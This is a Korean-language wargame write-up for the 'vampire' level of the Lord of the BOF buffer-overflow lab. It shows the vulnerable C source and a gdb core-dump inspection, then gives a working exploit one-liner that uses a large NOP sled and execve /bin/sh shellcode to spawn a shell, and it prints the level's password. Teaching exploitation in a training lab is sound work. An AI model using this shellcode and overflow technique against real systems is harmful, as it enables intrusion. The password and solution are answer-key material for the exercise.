9. troll → vampire

[troll@localhost troll]$ cat -n vampire.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - vampire
     4	        - check 0xbfff
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	main(int argc, char *argv[])
    11	{
    12		char buffer[40];
    13	
    14		if(argc < 2){
    15			printf("argv error\n");
    16			exit(0);
    17		}
    18	
    19		if(argv[1][47] != '\xbf')
    20		{
    21			printf("stack is still your friend.\n");
    22			exit(0);
    23		}
    24	
    25	        // here is changed!
    26	        if(argv[1][46] == '\xff')
    27	        {
    28	                printf("but it's not forever\n");
    29	                exit(0);
    30	        }
    31	
    32		strcpy(buffer, argv[1]); 
    33		printf("%s\n", buffer);
    34	}

 

26~30 코드를 보니 argv[1]의 47번째와 \xff를 비교하여 같다면 프로그램이 종료되는 구조입니다.

즉, 우리가 기존에 ret addr를 스택 상의 어떠한 부분으로 덮어왔는데

보통 0xbfff???? 이런 식으로 덮어오던 거 기억하시나요?

 

 

 

제가 Lob 첫 번째 포스트 편에서도 말씀드렸듯이 메모리 구조를 알고 있다면 굉장히 단순한 문제입니다.

2018/07/23 - [wargame write-up/Lord of BOF] - LoB 원정대 start

 

 

간단히 복습해보자면 프로그램이 실행되면 메인 메모리(RAM)에 다음과 같이 할당됩니다. 

 

낮은 주소 (Low Address) 높은 주소 (High Address)	데이터 영역 (Data Area)
	힙 영역 (Heap Area)	↓
	스택 영역 (Stack Area)	↑
	커널 영역 (Karnel Area)

 

이 문제를 풀기 위해선, 스택 영역을 0xbfff???? 보다 낮은 주소, 0xbffe???? 까지 늘려야 함을 알 수 있겠죠?

 

 

 

임의의 값을 0x10000개 넣고 코어 파일을 열어보면

[troll@localhost troll]$ `python -c 'print "./test " + "A"*44 + "\xbf\xbf\xbf\xbf" + "\x90"*0x10000'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) i reg $esp
esp            0xbffefaf0	-1073808656
(gdb) x/40wx $esp
0xbffefaf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffefb80:	0x90909090	0x90909090	0x90909090	0x90909090

 

 

주소가 0xbffe????까지 내려간 것을 확인할 수 있습니다.

이제 이 수많은 \x90(nop) 뒤에 쉘 코드를 딱 넣어놓으면 쭉 실행이 되겠죠?

 

바로 가볼까요

 

 

[troll@localhost troll]$ `python -c 'print "./vampire " + "A"*44 + "\x50\xfb\xfe\xbf" + "\x90"*0x10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP򿐐1󿿐h//shh/bin⏓ᙰ
                                                            ̀ 
bash$ whoami
vampire
bash$ my-pass
euid = 509
music world

 

 

이.. 지.. 하게 쉘이 뜹니다.